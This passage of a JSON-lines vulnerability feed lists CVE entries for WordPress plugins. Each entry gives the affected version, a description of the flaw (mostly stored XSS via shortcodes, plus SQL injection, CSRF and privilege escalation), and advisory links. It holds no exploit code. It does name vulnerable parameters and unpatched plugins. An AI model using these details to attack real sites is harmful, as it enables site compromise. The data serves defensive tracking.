\\/plugins.trac.wordpress.org\\\/browser\\\/wp-blog-post-layouts\\\/trunk\\\/includes\\\/src\\\/list\\\/element.php#L1136\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-blog-post-layouts\\\/trunk\\\/includes\\\/src\\\/masonry\\\/element.php#L1134\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-blog-post-layouts\\\/trunk\\\/includes\\\/src\\\/masonry\\\/element.php#L1134\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9304","slug":"locateandfilter","versionImpact":"1.6.14","description":"The LocateAndFilter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.6.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a10ee67a-7f5f-43dd-8f5c-c0e92706c453?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a10ee67a-7f5f-43dd-8f5c-c0e92706c453?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/locateandfilter\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/locateandfilter\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25218","slug":"wp-responsive-photo-gallery","versionImpact":"1.0.3","description":"The Photo Gallery Slideshow & Masonry Tiled Gallery plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 1.0.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05ff1b1e-f7ba-485d-9421-9bb38f6831ef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05ff1b1e-f7ba-485d-9421-9bb38f6831ef?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-responsive-photo-gallery\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-responsive-photo-gallery\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-photo-gallery\\\/tags\\\/1.0.3\\\/wp-responsive-photo-gallery.php#L1393\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-photo-gallery\\\/tags\\\/1.0.3\\\/wp-responsive-photo-gallery.php#L1393\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-photo-gallery\\\/tags\\\/1.0.4\\\/wp-responsive-photo-gallery.php#L1614\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-photo-gallery\\\/tags\\\/1.0.4\\\/wp-responsive-photo-gallery.php#L1614\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11229","slug":"mshop-naver-talktalk","versionImpact":"1.1.18","description":"The ???? ??? plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's add_plus_friends and add_plus_talk shortcodes in all versions up to, and including, 1.1.18 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mshop-naver-talktalk\\\/trunk\\\/includes\\\/class-msntt-plus-friends.php#L168\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mshop-naver-talktalk\\\/trunk\\\/includes\\\/class-msntt-plus-friends.php#L168\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mshop-naver-talktalk\\\/trunk\\\/includes\\\/class-msntt-plus-friends.php#L215\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mshop-naver-talktalk\\\/trunk\\\/includes\\\/class-msntt-plus-friends.php#L215\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mshop-naver-talktalk\\\/trunk\\\/includes\\\/class-msntt-plus-friends.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mshop-naver-talktalk\\\/trunk\\\/includes\\\/class-msntt-plus-friends.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mshop-naver-talktalk\\\/trunk\\\/includes\\\/class-msntt-plus-friends.php#L23\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mshop-naver-talktalk\\\/trunk\\\/includes\\\/class-msntt-plus-friends.php#L23\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191812\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191812\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mshop-naver-talktalk\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mshop-naver-talktalk\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/226baf3e-1b28-4196-9438-0b17fef4c5af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/226baf3e-1b28-4196-9438-0b17fef4c5af?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11427","slug":"catch-popup","versionImpact":"1.4.4","description":"The Catch Popup plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'catch-popup' shortcode in all versions up to, and including, 1.4.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/catch-popup\\\/trunk\\\/inc\\\/shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/catch-popup\\\/trunk\\\/inc\\\/shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/catch-popup\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/catch-popup\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ac7c825-aa5e-42fb-b1df-8be72945941c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ac7c825-aa5e-42fb-b1df-8be72945941c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12520","slug":"dominion-domain-checker-wpbakery-addon","versionImpact":"2.2.2","description":"The Dominion \u2013 Domain Checker for WPBakery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'dominion_shortcodes_domain_search_6' shortcode in all versions up to, and including, 2.2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dominion-domain-checker-wpbakery-addon\\\/trunk\\\/modules\\\/domain_search\\\/domain_search_6\\\/doamin_search_shortcodes.php#L91\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dominion-domain-checker-wpbakery-addon\\\/trunk\\\/modules\\\/domain_search\\\/domain_search_6\\\/doamin_search_shortcodes.php#L91\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/dominion-domain-checker-wpbakery-addon\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/dominion-domain-checker-wpbakery-addon\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a684f597-da72-4697-9e37-ca45a30ca64d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a684f597-da72-4697-9e37-ca45a30ca64d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13595","slug":"simple-signup-form","versionImpact":"1.6.5","description":"The Simple Signup Form plugin for WordPress is vulnerable to SQL Injection via the 'id' attribute of the 'ssf' shortcode in all versions up to, and including, 1.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-signup-form\\\/trunk\\\/simple_signup_form.php#L120\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-signup-form\\\/trunk\\\/simple_signup_form.php#L120\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26c4008a-9043-4293-aaf3-8e72de667ad8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26c4008a-9043-4293-aaf3-8e72de667ad8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10894","slug":"payment-forms-for-paystack","versionImpact":"4.0.2","description":"The Payment Forms for Paystack plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes like 'datepicker', 'textarea', and 'text' in all versions up to, and including, 4.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/4.0.0\\\/includes\\\/classes\\\/class-field-shortcodes.php#L218\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/4.0.0\\\/includes\\\/classes\\\/class-field-shortcodes.php#L218\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/4.0.0\\\/includes\\\/classes\\\/class-field-shortcodes.php#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/4.0.0\\\/includes\\\/classes\\\/class-field-shortcodes.php#L62\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/4.0.0\\\/includes\\\/classes\\\/class-field-shortcodes.php#L99\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/4.0.0\\\/includes\\\/classes\\\/class-field-shortcodes.php#L99\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3210130%40payment-forms-for-paystack&new=3210130%40payment-forms-for-paystack&sfp_email=&sfph_mail=#file7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3210130%40payment-forms-for-paystack&new=3210130%40payment-forms-for-paystack&sfp_email=&sfph_mail=#file7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20b0a946-f429-4615-9d16-4a95a9120c3d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20b0a946-f429-4615-9d16-4a95a9120c3d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-47582","slug":"wpbot-pro","versionImpact":"12.7.0","description":"Deserialization of Untrusted Data vulnerability in QuantumCloud WPBot Pro Wordpress Chatbot allows Object Injection.This issue affects WPBot Pro Wordpress Chatbot: from n\/a through 12.7.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wpbot-pro\\\/vulnerability\\\/wordpress-wpbot-pro-wordpress-chatbot-12-7-0-php-object-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wpbot-pro\\\/vulnerability\\\/wordpress-wpbot-pro-wordpress-chatbot-12-7-0-php-object-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6538","slug":"post-rating-and-review","versionImpact":"1.3.4","description":"The Post Rating and Review plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018class\u2019 parameter in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-rating-and-review\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-rating-and-review\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12a89b8f-554c-4d92-adb2-ec84138d568d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12a89b8f-554c-4d92-adb2-ec84138d568d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0490","slug":"fx-toc","versionImpact":"1.1.0","description":"The f(x) TOC WordPress plugin through 1.1.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9b497d21-f075-41a9-afec-3e24034c8c63\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9b497d21-f075-41a9-afec-3e24034c8c63\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2087","slug":"essential-blocks","versionImpact":"4.0.6","description":"The Essential Blocks plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.0.6. This is due to missing or incorrect nonce validation on the save function. This makes it possible for unauthenticated attackers to change plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/4.0.6\\\/includes\\\/Admin\\\/Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/4.0.6\\\/includes\\\/Admin\\\/Admin.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d38d41c7-8786-4145-9591-3e24eff3b79c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d38d41c7-8786-4145-9591-3e24eff3b79c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2900595%40essential-blocks%2Ftrunk&old=2900029%40essential-blocks%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2900595%40essential-blocks%2Ftrunk&old=2900029%40essential-blocks%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3168","slug":"wp-reroute-email","versionImpact":"1.4.9","description":"The WP Reroute Email plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an email subject in versions up to, and including, 1.4.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2933637\\\/wp-reroute-email\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2933637\\\/wp-reroute-email\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a0e962b-b6a0-4179-91d0-5ede508a9895?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a0e962b-b6a0-4179-91d0-5ede508a9895?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3547","slug":"all-in-one-b2b-for-woocommerce","versionImpact":"1.0.3","description":"The All in One B2B for WooCommerce WordPress plugin through 1.0.3 does not properly check nonce values in several actions, allowing an attacker to perform CSRF attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3cfb6696-18ad-4a38-9ca3-992f0b768b78\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3cfb6696-18ad-4a38-9ca3-992f0b768b78\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1566","slug":"redirects","versionImpact":"1.2.1","description":"The Redirects plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save function in all versions up to, and including, 1.2.1. This makes it possible for unauthenticated attackers to change redirects created with this plugin. This could lead to undesired redirection to phishing sites or malicious web pages.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c6be7f2-5526-4fba-9fe0-003b8460c926?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c6be7f2-5526-4fba-9fe0-003b8460c926?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/redirects\\\/trunk\\\/index.php#L118\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/redirects\\\/trunk\\\/index.php#L118\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4459","slug":"themesflat-addons-for-elementor","versionImpact":"2.1.1","description":"The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widget's titles in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce7c2f30-188a-4ae7-976f-c7f0aaf96eee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce7c2f30-188a-4ae7-976f-c7f0aaf96eee?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-simple-slide.php#L1117\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-simple-slide.php#L1117\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6574","slug":"laposta","versionImpact":"1.12","description":"The Laposta plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.12. This is due to the plugin not preventing direct access to several test files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website. This plugin is no longer being maintained and has been closed for downloads.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7632fe73-4011-4e6e-8ce7-38a9359ac259?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7632fe73-4011-4e6e-8ce7-38a9359ac259?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/laposta\\\/trunk\\\/includes\\\/laposta-php-1.2\\\/examples\\\/member\\\/all.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/laposta\\\/trunk\\\/includes\\\/laposta-php-1.2\\\/examples\\\/member\\\/all.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7493","slug":"wpcom-member","versionImpact":"1.5.2.1","description":"The WPCOM Member plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.5.2.1. This is due to the plugin allowing arbitrary data to be passed to wp_insert_user() during registration. This makes it possible for unauthenticated attackers to update their role to that of an administrator during registration.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec7f3e0c-a07c-4082-9b6b-12d0fbe0fdc8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec7f3e0c-a07c-4082-9b6b-12d0fbe0fdc8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpcom-member\\\/tags\\\/1.5.2\\\/includes\\\/form-validation.php#L267\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpcom-member\\\/tags\\\/1.5.2\\\/includes\\\/form-validation.php#L267\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9274","slug":"elastik-page-builder","versionImpact":"0.27.4","description":"The Elastik Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 0.27.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/315687d4-9125-440b-9d53-81d71e56d4ef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/315687d4-9125-440b-9d53-81d71e56d4ef?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elastik-page-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elastik-page-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11228","slug":"pgall-for-woocommerce","versionImpact":"5.1.4","description":"The ????? ?? ???? \u2013 ???? ?? ???? plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's pafw_instant_payment shortcode in all versions up to, and including, 5.1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pgall-for-woocommerce\\\/trunk\\\/templates\\\/checkout\\\/pafw\\\/instant-payment.php#L11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pgall-for-woocommerce\\\/trunk\\\/templates\\\/checkout\\\/pafw\\\/instant-payment.php#L11\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191856\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191856\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pgall-for-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pgall-for-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2fe166a9-8e80-4bb9-8074-5404289f5685?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2fe166a9-8e80-4bb9-8074-5404289f5685?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12519","slug":"tcbd-auto-refresher","versionImpact":"2.0","description":"The TCBD Auto Refresher plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tcbd_auto_refresh' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tcbd-auto-refresher\\\/trunk\\\/plugin-hook.php#L115\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tcbd-auto-refresher\\\/trunk\\\/plugin-hook.php#L115\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tcbd-auto-refresher\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tcbd-auto-refresher\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/851bade8-bd3a-4fb1-8a1d-12461287694e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/851bade8-bd3a-4fb1-8a1d-12461287694e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13588","slug":"simplebooklet","versionImpact":"1.1.0","description":"The Simplebooklet PDF Viewer and Embedder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'simplebooklet' shortcode in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected 